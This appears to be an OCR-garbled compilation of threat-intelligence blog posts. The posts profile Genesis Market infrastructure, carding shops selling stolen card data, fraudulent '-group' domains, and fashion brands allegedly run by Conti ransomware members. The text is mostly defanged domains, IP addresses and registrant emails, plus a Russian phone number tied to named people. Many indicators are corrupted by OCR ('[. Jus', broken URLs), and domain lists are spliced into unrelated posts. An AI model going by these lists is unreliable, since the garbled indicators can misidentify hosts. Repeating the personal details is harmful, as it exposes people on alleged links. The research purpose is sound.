hxxp://laughingmountain[.]us 
hxxp://apressrve[.]us 
hxxp://ipuhcuartal[.]us 
hxxp://armorforg[.]us 
hxxp://enfieldnh[. Jus 
hxxp://nflstreamign[.]us 
hxxp://vondollens[.]us 
hxxp://plote[.]us 
hxxp://reviewandkeep[.]us 
hxxp://marmorinotools[.]us 
hxxp://aretes[.]us 
hxxp://thesuicidesquad[.]us 
hxxp://technofreak[.]us 
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scope-groupmain .cc - Email: don.ram@yahoo.com 
strol-groupli .cn - Email: abuseemaildhcp@gmail.com 
summit-groupinc .cc - Email: Gregory.Michell2009@yahoo.com 
theblackend .cn - Email: morgan.greg@yahoo.com 
vector-groupfine .cn - Email: abuseemaildhcpo@gmail.com 


vector-groupfly .cc - Email: mr.freeddyy@yahoo.com 
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hxxp://shannonlee[.]us 
hxxp://woodgroup[.]us 
hxxp://regon[.]us 
hxxp://cosmoquest[.]us 
hxxp://medicaltooll[.]us 
hxxp://simplyjoy[.]Jus 
hxxp://johnandrachel[.Jus 
hxxp://ycpc[.]us 
hxxp://soleasylum[.]us 
hxxp://theweightloss[.]us 
hxxp://ecadets[.]us 
hxxp://insuremywedding[.]us 
hxxp://clevelland[.]Jus 
hxxp://fixn[.Jus 
hxxp://rdrs[.]Jus 
hxxp://shedbar[.]us 
hxxp://secra[.]us 
hxxp://loansforbusiness[.]us 
hxxp://charlieward[.]us 
hxxp://cruzaninternationall[.]Jus 
hxxp://tangentmedial.]us 
hxxp://vintagevisions[.]us 
hxxp://besthairstyle[.]us 
hxxp://growtherapy[.]us 
hxxp://rative[.]us 
hxxp://bayh[.]us 
hxxp://lawebooks[.]us 
hxxp://itechsolution[.]us 
hxxp://jordanrubin[.]us 
hxxp://cuyahogacountyjobs[.]us 
hxxp://squaredle[.]Jus 
hxxp://ymbeauty[.]us 
hxxp://iyem[.]us 
hxxp://windowsmiths[.]us 
hxxp://citilink[.]us 
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hxxp://emergentvillage[.]us 
hxxp://sportswearshop[.]us 
hxxp://careview[.]us 
hxxp://aatransportation[.]us 
hxxp://islamisohbet[.]us 
hxxp://therb[.]Jus 
hxxp://bmtrust[.]us 
hxxp://codecracker[.]us 
hxxp://wholechoice[.]us 
hxxp://santees[.]us 
hxxp://tollandbaseball[.]us 
hxxp://ianbc[.Jus 
hxxp://medicix[.]us 
hxxp://chryslertradeassistance[.]us 
hxxp://bgtheere[.]us 
hxxp://cofmfantrack[.]us 
hxxp://healthbeast[.]Jus 
hxxp://recordswspd[.]us 
hxxp://kinifinity[.Jus 
hxxp://modernafricanart[.]us 
hxxp://sargeantcarter[.]us 
hxxp://madsioncoia[.]us 
hxxp://solidvision[.]Jus 
hxxp://thewebgenie[.]us 
hxxp://topperzstore[.]us 
hxxp://wikirby[.]us 
hxxp://lifesparks[.Jus 
hxxp://stemnet[.]us 
hxxp://domuspro[.]us 
hxxp://realcot[.]us 
hxxp://scanlock[.]us 
hxxp://villageconnect[.]us 
hxxp://uunt[.]Jus 
hxxp://generaltrading[.]us 
hxxp://flydesigns[.]us 
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hxxp://openrealty[.]us 
hxxp://nofooll[.]us 
hxxp://platinumautodetailing[.]us 
hxxp://digitcom[.]us 
hxxp://masterads[.]us 
hxxp://walkermarketing[.]us 
hxxp://glassdoors[.]us 
hxxp://freelygiven[.]us 
hxxp://machome[.]us 
hxxp://posttraumatic[.]us 
hxxp://webmovies[.]us 
hxxp://sweetwalk[.]Jus 
hxxp://gracefilms[.]us 
hxxp://kisalt[.]us 
hxxp://rivermusic[.]us 
hxxp://wesenberg[.]us 
hxxp://harpun[.]us 
hxxp://markrhodes[.]us 
hxxp://aurorail[.]Jus 
hxxp://confidal[.]us 
hxxp://ketec[.]us 
hxxp://petroenergy[.]us 
hxxp://nilda[.Jus 
hxxp://msplogistics[.]us 
hxxp://reelcoat[.]us 
hxxp://bestrentalcar[.]us 
hxxp://floridagulfcoastrealty[.]us 
hxxp://securityguardservices|[.]us 
hxxp://freedomdecals[.]us 
hxxp://superfuture[. Jus 
hxxp://duakids[.]us 
hxxp://felixsolutions[.]us 
hxxp://dreambedding[.]us 
hxxp://influencedesign[.]Jus 


hxxp://sakuratal[.]Jus 
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hxxp://greenteegolf[.Jus 
hxxp://suretyillinois[.]us 
hxxp://cottagebuilders[.]Jus 
hxxp://ocelliis[.Jus 
hxxp://brasslantern[.]us 
hxxp://computax[.]us 
hxxp://disneyan[.]us 
hxxp://enviroenergytech[.]us 
hxxp://equinescience[.]us 
hxxp://goldsaude[.]Jus 
hxxp://andrewandcarleyminted[.]us 
hxxp://cabarruscountyjail[.]us 
hxxp://contactyou[.]us 
hxxp://deliveax[.]us 
hxxp://desimon|[.]us 
hxxp://islandsoapco[.]us 
hxxp://nhgttan[.]us 
hxxp://kedexpresskedplasma[.]us 
hxxp://mirit[.]us 
hxxp://inboundlogistic[.]us 
hxxp://realtyalliance[.Jus 
hxxp://loginnetease[.]us 
hxxp://travelquestinc[.]us 
hxxp://wifiresorts[.]us 
hxxp://wificamps[.]us 
hxxp://myschoolphotos[.]us 
hxxp://vegetarianrecipes[.]us 
hxxp://propertymanagementillc[.]us 
hxxp://taqueriaguadalajara[.]Jus 
hxxp://rxelite[.]us 
hxxp://topiaireflowershop[.]us 
hxxp://videocamrepair[.]us 
hxxp://hanmibank[.]Jus 
hxxp://popmag[.]us 
hxxp://travelopolis[.Jus 
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hxxp://thefreedomring[.]us 
hxxp://adorablepetsonline[.Jus 
hxxp://donno[.]us 
hxxp://icookedit[.]us 
hxxp://bagsales[.]us 
hxxp://fromyou[.]us 
hxxp://evolvetherapy[.]us 
hxxp://supercall[.]us 
hxxp://disservices[.]us 
hxxp://speedwagon[.]us 
hxxp://thistlehill[.]us 
hxxp://clonemat[.]us 
hxxp://cheapjewelry[.Jus 
hxxp://verticalflight[.]us 
hxxp://ayssarealestate[.]us 
hxxp://topclothingstores[.]us 
hxxp://tnonline[.]Jus 
hxxp://lataqueria[.]us 
hxxp://psdny[.]us 
hxxp://primecentrall[.]us 
hxxp://tostart[.]us 
hxxp://garagebabes|[.]us 
hxxp://thepriest[.]us 
hxxp://pertl[.]us 
hxxp://nhandbagoutlet[.]us 
hxxp://coinsandcollectibles[.]us 


hxxp://steamshower[.]us 


hxxp://happilyeverhendricks[.]us 


hxxp://fortmiller[.]us 
hxxp://bestdigitalreviews[.]us 
hxxp://ejbell[.Jus 
hxxp://ruleer[.]Jus 
hxxp://bransonsnantucke[.]us 
hxxp://rccgvictoryhouse[.]us 


hxxp://meghandben|. ]us 
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hxxp://mlfb[.]us 
hxxp://moxiecommunications[. ]us 
hxxp://restrap[.]us 
hxxp://onesweetworld[.]us 
hxxp://smzexplainervideos[.]us 
hxxp://wildelement[.]us 
hxxp://xpchelps[.]Jus 
hxxp://grrace[.]us 
hxxp://hikmt[.]us 
hxxp://nissantradeassistance[.]us 
hxxp://handgunslaws[.]us 
hxxp://kensingtongear[.]us 
hxxp://spiritrenew[.]us 
hxxp://springpremiergroup[.]Jus 
hxxp://theellisgroupholdings[.]Jus 
hxxp://theviolentworldofparker[.]Jus 
hxxp://utilitybillingsystems[.]us 
hxxp://ciestosolutions[.]us 
hxxp://vacumed[.]us 
hxxp://prettyhandsome[.]us 
hxxp://immigrationlawyernearme[.]us 
hxxp://partyofsix[.]us 
hxxp://worldcampaign[.]us 
hxxp://oldschoolpizzerial.]us 
hxxp://pbswiss[.]us 
hxxp://soulblossom[.]us 
hxxp://omegassl[.]us 
hxxp://prestigesuites[.]us 
hxxp://freeinsta[.]us 
hxxp://beautyinternationall[.]us 
hxxp://licorne[.]us 
hxxp://thekeyrealtor[.]us 
hxxp://bluenosepitbulls[.]us 
hxxp://embraceyourbeauty[.]us 
hxxp://smartwms[. Jus 
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hxxp://silverisles[.]us 
hxxp://theservicecenter[.]us 
hxxp://dkub[.]Jus 
hxxp://patriotsshop[.]us 
hxxp://brightsize[.]us 
hxxp://greenandsimple[.]us 
hxxp://spacenavy[.]Jus 
hxxp://gamefiles[.]Jus 
hxxp://eagleflies[.]us 
hxxp://answerconnect[.]us 
hxxp://leansystems[.]us 
hxxp://oiam[.]Jus 
hxxp://gsrc[.]us 
hxxp://hillandco[.]us 
hxxp://sendyou[.]us 
hxxp://allbestproducts[.]us 
hxxp://foodpass[.]us 
hxxp://infinitymortgagecorp[.]us 
hxxp://dibaclothing[.Jus 
hxxp://mytreestyle[.Jus 
hxxp://collegeshare[.]us 
hxxp://pccgrant[.]us 
hxxp://dialquickbooks[.]us 
hxxp://carmenscateringcolorado[.]us 
hxxp://coloradojob[.]us 
hxxp://virusinsurancecoveragel[.]us 
hxxp://jthebiggamehunter[.]us 
hxxp://internetstrategy[.]us 
hxxp://Itfventures[.]us 
hxxp://pandoracharmsaleclearance[.]us 
hxxp://telagram[.]us 
hxxp://arizonacardinalsshopl[. Jus 
hxxp://illumicrate[.]Jus 
hxxp://jnifusion[.Jus 
hxxp://mouseyl[.]us 
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hxxp://mariounfair[.]us 
hxxp://btrim[.]us 
hxxp://goldenrecovery[.]us 
hxxp://aviatorhub[.]us 
hxxp://vipfireworks[.]us 
hxxp://rroantoche[.]us 

So, what’s the news? Already done. 


1. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEiiZt-xLYQNjxus6mcumvldp0cxX1Kke jW-QNIqxpd-a4CUu 
FHuL117cjK7f0gTY8Yy43eyvb4Ytni0YOrISP1RgXdjQZM9aFBCisx 
2. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEivOhz3AFeFu-GAWatog1YsdN9tukNq8KHxTfZ580khvX2wXx 
fatZtIPa_oTqfSZ5zkwiFScLbnvvc_u6w2kEQ62dj3uD71p1QCoCBQ 


19.3.14 Upcoming Bulgaria 24 TV Show "Cyber Wars" Participation (2023-03-31 09:52) 


[1] 


Dear blog readers, 
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Great news. It appears that I'll be participating in the upcoming TV show "Cyber Wars" on 
Bulgaria 24 channel with an interview. 


| wanted to say big thanks to the filming crew and the host for the invitation and the questions 
and | hope that we’ll soon meet again for yet another interview and a conversation. 


[3] 


27091 


[4] 
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affina-groupnet.cn 
annuity-groupli¢c.cn 
entrust-groupsve.cn 
melson-groupli.cn 
mx affina-groupnet.cn 
mx.annuity-grouplic.cn 
mx.extreme-groupinc.cn 
mx massive-groupsve.cn 
mx puritan-groupine.cn A 222235197236 >Hi 222.35.136.0/21 ——AS-pe as3e356 
mxtotalgroupine.cn 
nsl.seddbutton.cn 
nsl.windcontrol.cc 
prime-groupco.com 
puritan-groupine.cn 
regency-groupnet.cn 
scope-groupmain.cn 


trans-groupmain.com 


Parked on 222.35.137.236: 

affina-groupnet .cn - Email: abuseemaildhcp@gmail.com 
affina-groupsvc .cc - Email: justin dickerson@ymail.com 
annuity-groupllic .cn - Email: abuseemaildhcp@gmail.com 
annuity-groupllc .com - Email: jelly@infotorrent.ru 
annuity-groupnet .cc - Email: justin dickerson@ymail.com 


annuity-groupnet .cn - Email: abuseemaildhcpo@gmail.com 
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You can watch it [5]Jhere. 
Enjoy! 


1. https: //blogger . googleusercontent .com/img/a/AVVXsEivbz8tBhBT3KAQGbyZgCX2CpMB65GKATU- z-n3h8at _kDhzIHhmVq7ZC 
TEAvgZQqQU43WnPXrimXLD2JMmU j JCLTOkj ohmdbTWH2_AWdm2fGRA 


2. https://blogger.googleusercontent .com/img/a/AVvXsEgr- IwMf0y JJ-rcVg3yPP-xgTWFQcet eNwlob-5X05x7G9A0n67rxRR 
991uRsOX3P1irKcKPPNSOIyJSywWjGLIuzGlgd- jXdjFXBsHfE1OHkOKg2 


3. https: //blogger. googleusercontent .com/img/a/AVvXsEiyotf yuug8YVKc177K2Hnm- AX-uYOgCCu0 J9cL1iTX98ktAk2d08010C 
i6IYO70ceiqje-AA1kJSKREFKHT9yAy7XYOvz5_6JmrJM9aZ4Ty9s9 


4. https: //blogger .googleusercontent .com/img/a/AVvXsEgmZZy98NLsg05VbkDgX2HZcv JTUgmm1iUnP1QCBtpgciun61LLE50hk7 
ejNtkPmEHUUaJf e9cQ6tmM6K8gxVD2LEWUTknpSXFQFOWUeKa24zRf 
5. https://cyberwars.cydefencetn.com/ 


19.4 April 


19.4.1 Dancho Danchev’s Video Interview at Bulgaria 24’s "Cyber Wars" TV Show 
(2023-04-01 19:43) 
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Dear blog readers, 


Feel like watching my latest and what appears to be first video interview on Bulgaria’s national 
television Bulgaria 24’s "Cyber Wars" TV show? 


Watch it [2]here or [3]here. 
Stay tuned! 


1. https: //blogger . googleusercontent . com/img/a/AVvXsEiJZIncIG78hJV80uW7NrxQICnYldgzGTpJYSZ131aN- 2ywaUCOjGJAtq 
RRORrsBOj8-dEwlWeKKWxpkEW16meGWyAS8NyPDHHvr5Swj315JVb2D 

2. https: //drive. google. com/file/d/1r80C9mtHayAar-boeC2v1FWwvouC2qGj /view?usp=drivesdk 

3. https: //youtu.be/plplc3wvaaM 


19.4.2 Exposing the Fashion Brands of the Conti Ransomware Group (2023-04-06 22:43) 


[1] 
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Dear blog readers, 


I’ve decided to share with everyone a series of photos obtained by data mining the recently 
leaked Conti ransomware gang’s internal communications with the idea to raise awareness 
on some of the fashion brands supposedly managed and operated by members of the 
[2]Conti ransomware gang. 


Sample personally identifiable information: 
hxxp://www.wildberries.ru/brands/leylo 
hxxp://instagram.com/leylo _wear 
leyloekb@gmail.com 
+7-912-633-13-03 
hxxp://leylo.ru/ 
hxxp://vk.com/leylo _wear 
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Sample photos include: 


JDEKABRATI ROCTMHBEIMIL 11 BOPR 
nPV NOZAEPXKE,CMY, 3BE30, TENEKAHANOB 


B MOJIAPOK IOBESIMPHAR KOF 
Vi QPYTVE WEHHbIE NPUSbI 


[4] 
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[5] 
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[6] 
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[7] 
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LEVLo 


Ae€TCKadA OACKXLa 


[8] 
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cr 


ACiCeces OACKAS 


CHENATb 3AKA3! 


[9] 
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[10] 
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archway-groupinc .cn - Email: abuseemaildhcp@gmail.com 
cosco-groupmain .com - Email: chug@freemailbox.ru 
extreme-groupinc .cn - Email: abuseemaildhcp@gmail.com 
integrity-groupinc .cc - Email: justin _dickerson@ymail.com 
integrity-groupinc .cn - Email: abuseemaildhcp@gmail.com 
integrity-groupsvc .com - Email: jelly@infotorrent.ru 
invalda-groupmain .cn - Email: rocco _invalda@yahoo.com 
lime-groupnet .cn - Email: abuseemaildhcp@gmail.com 


massive-groupsvc .cc - Email: chen.poon1732646@yahoo.com 
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eS, 


LUXURY PROMOTIONS 


PASSIONATE ABOUT ELEGANCE 


GIRLAS 


[11] 
27103 


ASCMGUROUP 


Stay tuned! 


1. https: //blogger . googleusercontent . com/img/a/AVvXsEiQymG8PAVYIG jmDQu6-A2sg3K_RZdcoCAsxBPSnOHoURfYhUReYSdCXI 
dK8dYfX6W3GikYK_WxP1mWNYbhfQDRXH_q_KnqYOV4t j5S£k1WBvMj 


2. https: //ddanchev. blogspot .com/2022/02/exposing- conti-ransomware-gang-osint_28.htm 


3. https: //blogger . googleusercontent . com/img/a/AVvXsEgy7Sd5Vrev4fxiglTEC-nryhutbVfayXxfPBbF8SKnDRtLNukXbIwPH6 


ZhM2CzfS5nbFuJMYkktzdO0nGRxfWwyWw_GudItcbCdbcmo0iTx0mbd 
. https://blogger . googleusercontent .com/img/a/AVvXsEhHkd8T3-zWaLY41LHEtQBNUn1c_OuWOo0T6CL8wGfi3Nvz-95ztFvQIp 
ymPMaaRk21ddyo4Rq0kQ7wxbR- 8Y3BX3eVQHUJPPo4o0CkFcrT_61zE 


RIG 


5, https: //blogger .googleusercontent.con/ng/a/AVWXsEi quaqL.faBKi-o8s RGB inELaligiaiwt® jay-KeTn du H6ITaLN 
6, hvtps://blogger.googleusercontent.con/ing/a/ AV isEidehrsixuDELYHQ7Tp2-240UvalisfXCNotGSkUyOvGBFBCICalizdudtd 


- 


https://blogger . googleusercontent . com/img/a/AVvXsEj0JSv23_-EhpZavVbBeTY9IEt 9XTNTxBrK7pIBCV5ZK_Fe5tB5eLisi 
OghrWRvNpUP3G37ng3stgVoEISM4ROrjC5jx4idnOuU6ax5Bct5G4 
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19.4.3 Profiling the Internet Connected Infrastructure of the Genesis Market 
Cybercrime-Friendly Online Marketplace (2023-04-06 22:43) 
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Dear blog readers, 


I’ve decided to take a deeper look inside the Internet connected infrastructure of the recently 
seized Genesis Market cybercrime-friendly marketplace with the idea to provide actionable 
intelligence and to assist vendors organizations and researchers including U.S Law Enforcement 
on its way to properly track down and monitor the cybercriminals behind these campaigns. 


Related Genesis Market domains: 
hxxp://sync[.]genesis-update[.]net 
hxxp://sync[.]genesis-security[.]net 
hxxp://g3n3sis[.]pro 
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hxxp://xmpp[.]genesis[.]market 

hxxp://genesis[.]marjet 

hxxp://g3n3sis[.lorg 

hxxp://sync[.]gsconnects[.]com 

hxxp://g3n3sis[.lorg 

hxxp://g3n3sis[.]pro 

hxxp://g3n3sis[.]me 

Sample IPs known to have been involved in the campaign include: 


¢ 195[.]206[.]181[.]217 


hxxp://sync.genesis-update.net 
hxxp://sync.genesis-security.net 
hxxp://g3n3sis.pro 
hxxp://xmpp.genesis.market 


¢ 89[.]44[.]9[.]110 


hxxp://genesis.marjet 
hxxp://g3n3sis.org 
hxxp://sync.gsconnects.com 


¢ 89[.]42[.]212[.]194 
* 163[.]172[.]125[.]48 


hxxp://genesis.marjet 
hxxp://g3n3sis.org 
hxxp://sync.gsconnects.com 
Sample related domains: 
hxxp://softexpertupdate.com 
hxxp://cms.softexpertupdate.com 
hxxp://179.43.157.79.mywebccon.us 
hxxp://seed.bitcoinstats.com 
hxxp://dnsseed.bluematt.me 
hxxp://psql04.exoffer.net 
hxxp://pornnhub.net 
hxxp://status.softexpertupdate.com 
hxxp://www.exoffer.net 
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hxxp://portal.softexpertupdate.com 
hxxp://server.softexpertupdate.com 
hxxp://www.softexpertupdate.com 
hxxp://mysql.softexpertupdate.com 
hxxp://nationalcasino-pl.org 
hxxp://g3n3sis.pro 
hxxp://sync.genesis-security.net 
hxxp://g3n3sis.org 
hxxp://www.pornnhub.net 
hxxp://mail.pornnhub.net 
hxxp://vps.pornnhub.net 
hxxp://ww1.pornnhub.net 
hxxp://ftp.pornnhub.net 
hxxp://vpn.pornnhub.net 
hxxp://mx.pornnhub.net 
hxxp://app.pornnhub.net 
hxxp://hostmaster.pornnhub.net 
hxxp://sync.genesis-update.net 
hxxp://remote.pornnhub.net 
hxxp://server.pornnhub.net 
hxxp://stage.pornnhub.net 
hxxp://citrix.pornnhub.net 
hxxp://email.pornnhub.net 
hxxp://files.pornnhub.net 

Sample IPs: 


¢ 179[.]43[.]157[.]79 


hxxp://exoffer[.]net - Email: lisadaleyOO24@gmail[.Jcom 


hxxp://softexpertupdate[.]com - Email: proprivxx@rambler[.]ru 
¢ 179[.]43[.]157[.]79 


hxxp://pornnhub[.]net - Email: mertvural@mynet[.]com; vuralmert@mynet[.]com 
hxxp://exoffer[.]net 
hxxp://123nextgift[.]com 
hxxp://update-flash[.]net 
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hxxp://recallsystem[.]net 
hxxp://flash-update[. ]net 
hxxp://k7mM58z65g32t[.]net 


hxxp://filesbase[.]Jnet - Email: aleksei[.]Jrqbakov@mail[.Jru - hxxp://realstatistics[.]info; 
hxxp://webstatisticspro[.]net 


hxxp://softexpertupdate[.]Jcom 
hxxp://pornnhub[. ]net 
Dots dots dots. We’ve already got the aleksei.rqbakov@mail.ru email profiled [2]here. 


Sample screenshots include: 
[3] 
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filesbase.net 


@ 


aleksei.rqbakov@mail.tu 


© © 


re alstatistics.info webstatisticspro.net 


[4] 
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@ @ 
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sofexpertupdate com pormnhub net filesbase net 
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123nextgRcom exofier net flash-update net k7?mS6z265g32inet 


1) 


fecalisystem. net 


update-flash net 
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89.42.212.194 


g3n3sis.pro www.genesis.market genesis.market xmpp.genesis.market 
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g3n3sis.org www.g3n3sis.org www.g3n3sis.me g3n3sis.me 


in 
in! 


syne.genesis-security.net sync.genesis-update.net 


Stay tuned! 
i; 


https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEhai7DB6ZPP-HU-hWIrvvul3Be2_XjEiadyrY8rwz7194st 


27109 


2. https: //www.forcepoint.com/blog/x-labs/uncovering-malicious-traffic-direction-system-blackhat-tds 
3. https: //blogger .googleusercontent.. com/img/b/R29vZ2x1/AVVXsEgP1UJaI9SEvBonR1PVtPzpTDEQNQJtMk_Qy Jbx_zLr9e1Pw 
4, stp: //blogger.googleuserconten.con/ig/’/120V2231/AVWEsFREVT22cXBVScb_ObBHTaHTHTSKO GTS GRYOpENRSHBI 


5. https: //blogger . googleusercontent.com/img/b/R29vZ2x1/AVVXsEjIc1Rj9kHPVtz_IHrzLZ0GJZQz45PdvjRjfgr6SkxXARRyqx 
1Zor9zAtGqUJ2vFmz39I-kbVnJ2vE1LTV_OMelwn1Xjnu0okqXmV8ss 


19.4.4 Exposing a Currently Active Domain Portfolio of E-Shops for Stolen Credit 
Cards Information (2023-04-10 11:10) 


172.67.170.28 0421.28.23 


Dear blog readers, 


I’ve decided to share with everyone a set of upcoming blog posts on the market for E-Shops 
for stolen and compromised credit card details with the idea to raise everyone’s awareness on 
the topic and the proliferation and easy to use and launch E-Shops for stolen and compromised 
credit card details. 


Sample personally identifiable email address accounts known to have been involved in the 
campaign include: 


MSMAZEVEDO@GMAIL[.]COM 
imakoos85@gmail[.]Jcom 
kang[.]hr[.Jig@gmail[.]Jcom 
powerdavel@gmaill.Jcom 
lunaritsolution@outlook[.Jcom 
ajewoletimmy@gmail[.]Jcom 
saarsoftware@gmail[.]com 
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bluetextmama@gmail[.Jcom 
eal958@gmail[.Jcom 
enguyen|[.]fr@gmail[.Jcom 
Sample responding IPs known to have been involved in the campaign include: 
47[.174[.]137[.]231 
47[.174[.]235[.]179 
27[.]102[.]128[.]164 
149[.]129[.]136[.]150 
92[.]38[.]135[.]251 
47[.174[.]177[.]133 
46[.]21[.]248[.149 
47[.174[.]236[.]158 
62[.]76[.]44[.]254 
47[.152[.]233[.]0 
194[.]147[.]34[.182 
209[.]99[.]40[.]226 
195[.]2[.]67[.]107 
45[.]153[.]230[.]30 
185[.]240[.]103[.]226 
185[.]14[.]30[.]108 
5[.]188[.]89[.]85 
54[.]197[.]O[.J101 
92[.]38[.]160[.14 
188[.]166[.]32[.]65 
47[.174[.]176[.164 
92[.]242[.]40[.]127 
185[.]217[.]199[.]57 
95[.]181[.]157[.]180 
161[.]117[.17[.]46 
149[.]129[.]226[.]244 
209[.]99[.]40[.J227 
47[.152[.]142[.]249 
95[.]161[.]129[.]77 
35[.]180[.]38[.]166 
91[.]225[.]216[.]6 
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193[.]187[.]175[.]159 
149[.]129[.]240[.]26 
88[.]119[.]179[.]216 
149[.]129[.]215[.]190 
172[.]67[.J223[.]35 
47[.]74[.]184[.]97 
49[.]51[.]85[.]205 
18[.]118[.]254[.]174 
46[.]173[.]214[.]200 
91[.]227[.]18[.]166 
192[.]3[.]80[.]115 
47[.]88[.]158[.]202 
45[.]153[.]73[.]8 
185[.]203[.]240[.]80 
185[.]159[.]129[.]106 
104[.]18[.]46[.]127 
172[.]67[.]195[.]158 
104[.]18[.]37[.]112 
188[.]114[.]99[.]128 
104[.]21[.]36[.]194 
104[.]18[.]36[.]112 
172[.]67[.]198[.]196 
172[.]64[.187[.]81 
188[.]114[.]96[.]3 
104[.]21[.]79[.]214 
188[.]114[.]97[.]14 
172[.]64[.]92[.]205 
20[.]102[.]115[.]223 
176[.]119[.]156[.]198 
78[.]155[.]207[.]76 
47[.J254[.]213[.]246 
95[.]181[.]179[.]111 
47[.]88[.]156[.]38 
91[.]203[.]192[.]138 
27[.]102[.]102[.]120 
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@) Annuity Group inc 


ll AboutUs Services Wews Vacancies OurPariners Contacts 


)- Bey W 
Bolton Powersefern 


prime-groupco .cn - Email: abuseemaildhcpo@gmail.com 
prime-groupco .com - Email: fuzz@ml3.ru 

prime-groupinc .cn - Email: abuseemaildhcpo@gmail.com 
puritan-groupinc .com - Email: gone@corporatemail.ru 
redeye-groupco .cn - Email: abuseemaildhcp@gmail.com 
redeye-groupinc .cc - Email: chen.p00n1732646@yahoo.com 
regency-groupnet .cc - Email: justin dickerson@ymail.com 
regency-groupnet .cn - Email: abuseemaildhcpo@gmail.com 
saturn-groupsvc .cn - Email: abuseemaildhcp@gmail.com 


saturn-groupsvc .com - Email: jelly@infotorrent.ru 
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193[.]70[.]95[.]200 
188[.]114[.]96[.]14 
213[.]183[.]61[.]45 
104[.]24[.J118[.]30 
92[.]38[.]135[.]185 
172[.]67[.J138[.]127 
188[.]114[.]96[.]9 
146[.]112[.]61[.]107 
172[.]67[.]135[.]89 
104[.]24[.]119[.]30 
188[.]114[.]97[.]15 
192[.]42[.]118[.]104 
172[.]67[.]184[.]64 
88[.]119[.]179[.]132 
47[.]74[.]176[.]216 
194[.]53[.J111[.]251 
185[.]180[.]231[.]7 
13[.]57[.J17[.]224 
104[.]31[.]76[.]164 
149[.]129[.]216[.]197 
198[.]105[.]254[.]11 
104[.]31[.]77[.]164 
34[.]209[.]208[.]254 
91[.]92[.]144[.]15 
104[.]21[.]32[.]66 
52[.]26[.]159[.J124 
104[.]21[.]52[.]206 
172[.]67[.]203[.]167 
104[.]24[.]97[.]90 
46[.]21[.]249[.]114 
95[.]213[.]203[.]64 
104[.]24[.]96[.]90 
149[.]129[.]219[.]23 
85[.]119[.]150[.]155 
134[.]122[.]46[.]76 
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46[.]173[.]215[.]186 
91[.]203[.]192[.]190 
192[.]3[.]161[.]183 
34[.]98[.]99[.]30 
176[.]107[.]160[.]148 
45[.]143[.]136[.]148 
142[.]93[.]122[.]253 
89[.]32[.]41[.]139 
194[.]67[.]71[.]134 
176[.]124[.]193[.]77 
150[.]109[.]48[.]71 
185[.]244[.]183[.]252 
45[.]143[.]137[.]41 
95[.]213[.]252[.]3 
18[.]220[.]144[.]78 
161[.]117[.]12[.]56 
185[.]233[.]0[.]27 
46[.]148[.]113[.]207 
109[.]70[.]26[.]37 
91[.]194[.]3[.]84 
185[.]224[.]212[.]28 
193[.]187[.]128[.]22 
92[.]38[.]135[.]250 
94[.J250[.]252[.]7 
185[.]224[.]212[.]29 
91[.]203[.]193[.]132 
194[.]67[.]71[.]93 
185[.]212[.]129[.]246 
5[.]178[.]2[.]230 
92[.]53[.177[.]40 
185[.]241[.]54[.J112 
92[.]242[.]40[.]199 
34[.]219[.]55[.]209 
2[.]57[.]187[.]160 
141[.]98[.]134[.]31 
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213[.]189[.]219[.]6 
192[.]162[.]246[.]117 
213[.]59[.]127[.]192 
104[.]18[.]38[.]216 
185[.]93[.]109[.]250 
78[.]155[.]206[.]161 
62[.]75[.]207[.]166 
195[.]140[.]147[.19 
91[.]142[.]78[.]202 
95[.]181[.]157[.]128 
91[.]199[.]147[.]94 
45[.]156[.]119[.]4 
92[.]53[.]77[.]90 
176[.]124[.]193[.]25 
44[.]192[.]59[.]70 
23[.]147[.]229[.]205 
193[.]187[.]175[.]33 
194[.]87[.]101[.]3 
45[.]85[.]117[.]104 
194[.]85[.]61[.]76 
62[.]77[.]154[.]3 
195[.]123[.]221[.]141 
193[.]187[.]174[.]103 
127[.]O[.JO[.]1 
104[.]24[.J112[.]44 
91[.]203[.]193[.]176 
193[.]187[.]175[.]104 
194[.]147[.]35[.]176 
47[.]254[.]201[.]251 
5[.]178[.]2[.]98 
94[.]130[.]10[.]95 


Related domains known to have been involved in the campaign include: 


hxxp://approved-cc[.]ru 
hxxp://approved-shop[.]be 
hxxp://approved-shop[.]su 
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hxxp://approved[.]moscow 
hxxp://approvedbazar[.]ru 
hxxp://bases-valid[.]Jcom 
hxxp://bazar-vclub[.]su 
hxxp://bingodumps[. Jru 
hxxp://cardcase[.]ru 
hxxp://carderbasesu[.]ru 
hxxp://carderprofit[.]p! 
hxxp://cardershop[. ]pl 
hxxp://carderstore[.]su 
hxxp://cardersvilla[.]ru 
hxxp://cardhouse[.]be 
hxxp://carding-forumcc[.]ru 
hxxp://carding-world[.]Jcom 
hxxp://cardingcvv[. ]pl 
hxxp://cardingcvv[.]su 
hxxp://cardingforums[.]su 
hxxp://cardingmaestro[.]com 
hxxp://cardingpro[.]ru 
hxxp://cardmafia[.]ru 
hxxp://cardsmarket[.]su 
hxxp://cardstorm[.]su 
hxxp://cardvilla[.]p 
hxxp://cc-shop[.]me 
hxxp://cc-shop[. ]pl 
hxxp://cc-stock[.]su 
hxxp://ccclc[.]ru 
hxxp://ccfullz[.Jsu 
hxxp://ccfullzshop[.]su 
hxxp://ccshoponline[.lorg 
hxxp://ccstores[.]Su 
hxxp://ccvv2dumps[.]com 
hxxp://centralshop[.Jim 
hxxp://centralshop[.]moscow 
hxxp://cf[.]myrecensionil. Jit 
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hxxp://charlotteshop[.]tk 
hxxp://cheapcvv[.]su 
hxxp://chinadump[. ]ru 
hxxp://cvs[.]ripccl[.Jru 
hxxp://cvv-fresh-shop[.]ru 
hxxp://cvv-seller[.]ru 
hxxp://cvv-shop[.]cc 
hxxp://cvv-shop[. ]pl 
hxxp://cvv2shop[.]me 
hxxp://cvv2u[.]su 
hxxp://cvvbank[.]ru 
hxxp://cvvcarders[.]Jcom 
hxxp://cvvdump[.]Jcom 
hxxp://cvvforsale[.]com 
hxxp://cvvlist[.]info 
hxxp://cvvme-shop[.]me 
hxxp://cvvonlineshops[.]Jcom 
hxxp://cvvshop39[.]su 
hxxp://cvvshoponline[.]ru 
hxxp://cvvshops[.]su 
hxxp://cvvunion-cvv[.]su 
hxxp://cvvunion-store[.]su 
hxxp://cvvunion[.]me 
hxxp://d4rksys[.]ru 
hxxp://dark-sell[.]ru 
hxxp://darkcarders[.]ru 
hxxp://darkteam[.]ru 
hxxp://dump-shop[. ]pl 
hxxp://dump99[.]Jcom 
hxxp://dumps247[.]su 
hxxp://dumps4free[. ]ru 
